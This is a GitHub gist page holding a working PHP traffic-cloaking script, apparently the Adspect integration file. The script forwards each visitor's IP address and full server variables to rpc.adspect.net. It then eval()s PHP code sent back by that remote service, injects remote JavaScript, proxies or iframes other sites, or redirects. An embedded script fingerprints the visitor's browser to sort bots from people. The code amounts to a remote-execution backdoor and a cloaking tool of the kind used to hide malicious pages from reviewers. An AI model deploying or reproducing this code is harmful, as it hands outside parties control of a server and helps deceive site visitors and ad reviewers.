Created
October 9, 2025 09:34
-
-
Save santaklouse/a0a28912ed78e26ceab823889525bcf8 to your computer and use it in GitHub Desktop.
Revisions
-
santaklouse created this gist
Oct 9, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,18 @@ <?php ini_set('display_errors','0');error_reporting(E_ALL);if(!function_exists('adspect')){function adspect_exit($code,$message){http_response_code($code);exit($message);}function adspect_dig($array,$key,$default=''){return array_key_exists($key,$array)?$array[$key]:$default;}function adspect_curl($url,$options){$curl=curl_init();curl_setopt_array($curl,[CURLOPT_URL=>$url,CURLOPT_CONNECTTIMEOUT=>60,CURLOPT_TIMEOUT=>60,CURLOPT_SSL_VERIFYHOST=>0,CURLOPT_SSL_VERIFYPEER=>0,]);if(!empty($options)){curl_setopt_array($curl,$options);}$content=curl_exec($curl);$errno=curl_errno($curl);if($errno){adspect_exit(500,'curl error: '.curl_strerror($errno));}$code=curl_getinfo($curl,CURLINFO_HTTP_CODE);$type=curl_getinfo($curl,CURLINFO_CONTENT_TYPE);curl_close($curl);return[$code,$content,$type];}function adspect_rpc_url($sid){$sid=adspect_dig($_GET,'__sid',$sid);$query=adspect_dig($_SERVER,'QUERY_STRING');return"https://rpc.adspect.net/v2/$sid?$query";}function adspect_client_ip($keys){foreach($keys as$key){if(isset($_SERVER[$key])){$ip=$_SERVER[$key];if(is_string($ip)){switch($key){case'HTTP_X_FORWARDED_FOR':case'HTTP_FORWARDED_FOR':if(!preg_match('{([^,\s]+)\s*$}',$ip,$m)){break;}$ip=$m[1];default:if(filter_var($ip,FILTER_VALIDATE_IP)){return$ip;}break;}}}}adspect_exit(500,'Client IP address not available');}function adspect_rpc_headers(){$ip=adspect_client_ip(['HTTP_CF_CONNECTING_IP','HTTP_TRUE_CLIENT_IP','HTTP_FASTLY_CLIENT_IP','HTTP_X_ENVOY_EXTERNAL_ADDRESS','HTTP_X_CLIENT_IP','HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_REAL_IP','HTTP_REAL_IP','HTTP_FORWARDED_FOR','REMOTE_ADDR',]);$ua=adspect_dig($_SERVER,'HTTP_USER_AGENT');return['User-Agent:',"Adspect-IP: $ip","Adspect-UA: $ua",];}function adspect_rpc_data(){$data=[];if($_SERVER['REQUEST_METHOD']==='POST'){if(!isset($_POST['data'])){adspect_exit(500,'Missing POST data');}$data=json_decode($_POST['data'],true);if(!is_array($data)){adspect_exit(500,'Invalid POST data');}if(isset($_COOKIE['_cid'])){$data['cid']=$_COOKIE['_cid'];}}$data['server']=$_SERVER;return json_encode($data);}function adspect_rpc($sid){list($code,$json)=adspect_curl(adspect_rpc_url($sid),[CURLOPT_HTTPHEADER=>adspect_rpc_headers(),CURLOPT_POST=>true,CURLOPT_POSTFIELDS=>adspect_rpc_data(),CURLOPT_RETURNTRANSFER=>true,]);if($code!==200){adspect_exit(500,"RPC error $code");}$data=json_decode($json,true);if(!isset($data['ok'],$data['js'],$data['cid'],$data['action'],$data['target'])){adspect_exit(500,'Invalid RPC response');}return[$data,$json];}function adspect_resolve_path($path){if($path[0]===DIRECTORY_SEPARATOR){$path=adspect_dig($_SERVER,'DOCUMENT_ROOT',__DIR__).$path;}else{$path=__DIR__.DIRECTORY_SEPARATOR.$path;}return realpath($path);}function adspect_spoof_request($url=''){$_SERVER['REQUEST_METHOD']='GET';$_POST=[];if($url!==''){$url=parse_url($url);if(isset($url['path'])){if(substr($url['path'],0,1)==='/'){$_SERVER['REQUEST_URI']=$url['path'];}else{$_SERVER['REQUEST_URI']=dirname($_SERVER['REQUEST_URI']).'/'.$url['path'];}}if(isset($url['query'])){parse_str($url['query'],$_GET);$_SERVER['QUERY_STRING']=$url['query'];}else{$_GET=[];$_SERVER['QUERY_STRING']='';}}}function adspect_try_files(){foreach(func_get_args()as$path){if(is_file($path)){if(!is_readable($path)){adspect_exit(403,'Permission denied');}header('Content-Type: text/html');switch(strtolower(pathinfo($path,PATHINFO_EXTENSION))){case'php':case'phtml':case'php5':case'php4':case'php3':adspect_require($path);exit;default:header('Content-Type: '.adspect_content_type($path));$name=basename($path);header("Content-Disposition: attachment; filename=\"$name\"");case'html':case'htm':header('Content-Length: '.filesize($path));readfile($path);exit;}}}}function adspect_require(){require_once func_get_arg(0);}function adspect_content_type($path){if(function_exists('mime_content_type')){$type=mime_content_type($path);if(is_string($type)){return$type;}}return'application/octet-stream';}function adspect_serve_local($url){$path=(string)parse_url($url,PHP_URL_PATH);if($path===''){return;}$path=adspect_resolve_path($path);if(is_string($path)){adspect_spoof_request($url);if(is_dir($path)){chdir($path);adspect_try_files('index.php','index.html','index.htm');}else{chdir(dirname($path));adspect_try_files($path);}}adspect_exit(404,'File not found');}function adspect_crypt($in,$key){$il=strlen($in);$kl=strlen($key);$out='';for($i=0;$i<$il;++$i){$out.=chr(ord($in[$i])^ord($key[$i%$kl]));}return$out;}function adspect_proxy_headers($keys){$headers=[];foreach($keys as$key){if(array_key_exists($key,$_SERVER)){$header=strtr(strtolower(substr($key,5)),'_','-');$headers[]="$header: {$_SERVER[$key]}";}}return$headers;}function adspect_proxy($url,$param=null,$key=null){$url=parse_url($url);if(empty($url)){adspect_exit(500,'Invalid proxy URL');}$options=[CURLOPT_USERAGENT=>adspect_dig($_SERVER,'HTTP_USER_AGENT'),CURLOPT_FOLLOWLOCATION=>true,CURLOPT_RETURNTRANSFER=>true,];extract($url);if(!isset($scheme)){$scheme='http';}if(!isset($host)){$host=adspect_dig($_SERVER,'HTTP_HOST','localhost');}if(isset($port)){$host="$host:$port";$options[CURLOPT_PORT]=$port;}$origin="$scheme://$host";if(!isset($path)){$path='/';}elseif($path[0]!=='/'){$path="/$path";}$url=$origin.$path;if(isset($query)){$url.="?$query";}$headers=adspect_proxy_headers(['HTTP_ACCEPT','HTTP_ACCEPT_LANGUAGE','HTTP_COOKIE']);$headers[]='Cache-Control: no-cache';$options[CURLOPT_HTTPHEADER]=$headers;list($code,$data,$type)=adspect_curl($url,$options);http_response_code($code);if(is_string($data)){if(isset($param,$key)&&preg_match('{^text/(?:html|css)}i',$type)){$base=$path;if($base[-1]!=='/'){$base=dirname($base);}$base=rtrim($base,'/');$rw=function($m)use($origin,$base,$param,$key){list($repl,$what,$url)=$m;$url=htmlspecialchars_decode($url);$url=parse_url($url);if(!empty($url)){extract($url);if(isset($host)){if(!isset($scheme)){$scheme='http';}$host="$scheme://$host";if(isset($port)){$host="$host:$port";}}else{$host=$origin;}if(!isset($path)){$path='';}if(!strlen($path)||$path[0]!=='/'){$path="$base/$path";}if(!isset($query)){$query='';}$host=base64_encode(adspect_crypt($host,$key));parse_str($query,$query);$query[$param]="$path#$host";$repl='?'.http_build_query($query);if(isset($fragment)){$repl.="#$fragment";}$repl=htmlspecialchars($repl);if($what[-1]==='='){$repl="\"$repl\"";}$repl=$what.$repl;}return$repl;};$re='{(href=|src=|url\()["\']?((?:https?:|(?!#|[[:alnum:]]+:))[^"\'[:space:]>)]+)["\']?}i';$data=preg_replace_callback($re,$rw,$data);}}else{$data='';}header("Content-Type: $type");header('Content-Length: '.strlen($data));echo$data;}function adspect_execute(){eval(func_get_arg(0));}function adspect($sid){header('Cache-Control: no-store');if(!function_exists('curl_init')){adspect_exit(500,'php-curl extension is missing');}if(!function_exists('json_encode')||!function_exists('json_decode')){adspect_exit(500,'php-json extension is missing');}$param='_';$key=hex2bin(str_replace('-','',$sid));if($key===false){adspect_exit(500,'Invalid stream ID');}if(array_key_exists($param,$_GET)&&strpos($_GET[$param],'#')!==false){list($url,$host)=explode('#',$_GET[$param],2);$host=adspect_crypt(base64_decode($host),$key);unset($_GET[$param]);$query=http_build_query($_GET);$url="$host$url?$query";adspect_proxy($url,$param,$key);exit;}list($data,$json)=adspect_rpc($sid);global$_adspect;$_adspect=$data;extract($data);if(isset($e)){eval($e);}if($js){setcookie('_cid',$cid,time()+60);return$data;}switch($action){case'local':adspect_serve_local($target);return null;case'proxy':adspect_proxy($target,$param,$key);exit;case'fetch':adspect_proxy($target);exit;case'iframe':$target=htmlspecialchars($target);exit("<!DOCTYPE html><html><head><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"></head><body><iframe src=\"$target\" style=\"position:absolute;top:0;left:0;width:100%;height:100%;border:none;\"></iframe>");case'noop':adspect_spoof_request($target);return null;case'301':case'302':case'303':case'307':case'308':header("Location: $target",true,(int)$action);exit;case'refresh':header("Refresh: 0; url=$target");adspect_spoof_request();return null;case'meta':$target=htmlspecialchars($target);exit("<!DOCTYPE html><head><meta http-equiv=\"refresh\" content=\"0; url=$target\">");case'form':$target=htmlspecialchars($target);exit("<!DOCTYPE html><html><body><form id=\"form\" action=\"$target\" method=\"GET\"></form><script>document.getElementById(\"form\").submit();</script>");case'assign':$target=json_encode($target);exit("<!DOCTYPE html><head><script>location.assign($target);</script>");case'replace':$target=json_encode($target);exit("<!DOCTYPE html><head><script>location.replace($target);</script>");case'top':$target=json_encode($target);exit("<!DOCTYPE html><head><script>top.location=$target;</script>");case'return':if(!is_numeric($target)){adspect_exit(500,'Non-numeric status code');}http_response_code((int)$target);exit;case'php':adspect_execute($target);return null;case'js':$target=htmlspecialchars(base64_encode($target));exit("<!DOCTYPE html><body><script src=\"data:text/javascript;base64,$target\"></script>");case'xar':header("X-Accel-Redirect: $target");exit;case'xsf':header("X-Sendfile: $target");exit;default:adspect_exit(500,'Unsupported action. Update integration file.');}return$data;}}$data=adspect('e52694d2-e4e7-481e-b8ab-3d7f98a76d8a');if(!isset($data)){return;}?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <script>(function(q,u,r,g,t,v,w,x){var n={},l={mode:"php",errors:n};try{function c(b,a){try{l[b]=a()}catch(f){n[b]=f.name}}function d(b,a){c(b,function(){function f(m){try{var h=a[m];switch(typeof h){case "object":null!==h&&(h=h.toString());break;case "function":h=u.prototype.toString.call(h)}e[m]=h}catch(y){n[b+"."+m]=y.name}}var e={},k;for(k in a)f(k);try{var p=q.getOwnPropertyNames(a);for(k=0;k<p.length;++k)f(p[k]);e["!!"]=p}catch(m){}return e})}d("console",r);d("document",g);(function(b,a){c(b,function(){var f= {};a=a.attributes;for(var e in a)e=a[e],f[e.nodeName]=e.nodeValue;return f})})("documentElement",g.documentElement);d("location",t);d("navigator",v);d("window",x);d("screen",w);c("timezoneOffset",function(){return(new Date).getTimezoneOffset()});c("closure",function(){return function(){}.toString()});l.frame=!0;c("frame",function(){l.frame=self!==top});c("touchEvent",function(){return q.prototype.toString.call(g.createEvent("TouchEvent"))});c("tostring",function(){function b(){}var a=0;b.toString= function(){++a;return""};r.log(b);return a});c("webgl",function(){var b=g.createElement("canvas").getContext("webgl"),a=b.getExtension("WEBGL_debug_renderer_info");return{vendor:b.getParameter(a.UNMASKED_VENDOR_WEBGL),renderer:b.getParameter(a.UNMASKED_RENDERER_WEBGL)}});function z(b,a,f){var e=b.prototype[a];b.prototype[a]=function(){l.proto=!0};f();b.prototype[a]=e}try{z(Array,"includes",function(){return g.createElement("video").canPlayType("video/mp4")})}catch(b){}}catch(c){}(function(){var c= g.createElement("form"),d=g.createElement("input");c.method="POST";c.action=t.href;d.type="hidden";d.name="data";d.value=JSON.stringify(l);c.appendChild(d);g.body.appendChild(c);c.submit()})()})(Object,Function,console,document,location,navigator,screen,window); </script> </body> </html> <?php exit;